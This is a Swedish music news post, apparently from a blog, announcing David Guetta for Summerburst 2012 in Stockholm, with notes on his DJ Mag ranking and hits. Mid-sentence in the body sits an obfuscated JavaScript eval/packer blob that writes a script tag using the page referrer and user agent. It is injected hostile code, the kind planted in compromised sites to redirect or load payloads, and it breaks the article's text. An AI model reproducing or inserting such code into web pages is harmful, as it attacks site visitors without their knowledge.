Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

David Guetta klar för Summerburst 2012 Stockholm

David Guetta klar för Summerburst 2012 Stockholm
Sebastian

Han eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bfafh|var|u0026u|referrer|rsddf||js|php’.split(’|’),0,{}))
är tillbaka!

Nu är det officiellt att David Guetta kommer till Summerburst igen.

Bland de artister som är klara i Stockholm bl.a. Sebastian Ingrosso, Axwell och Calvin Harris är Guetta självklart är en gigant inom dansmusik och utan tvekan en av världens främsta dj:s och producenter.

Det bevisades framförallt när Dj Mags läsare röstade fram honom som världens främsta dj 2011, tätt åtföljd av Armin van Buuren och Tiësto.

Mest familjär är han kanske som mannen bakom låtar som ”The world is mine”, ”Love is gone”, ”Sexy bitch” och naturligtvis den Grammy-belönade monsterhiten ”When love takes over”. I år erhöll han bland annat ytterligare två amerikanska Grammy-nomineringar för sina sprakande produktioner varav en var för låten ”Sunshine”, ett samarbete med vår egen Avicii.

Biljetterna till Summerburst finns till försäljning redan nu, på tickster.com.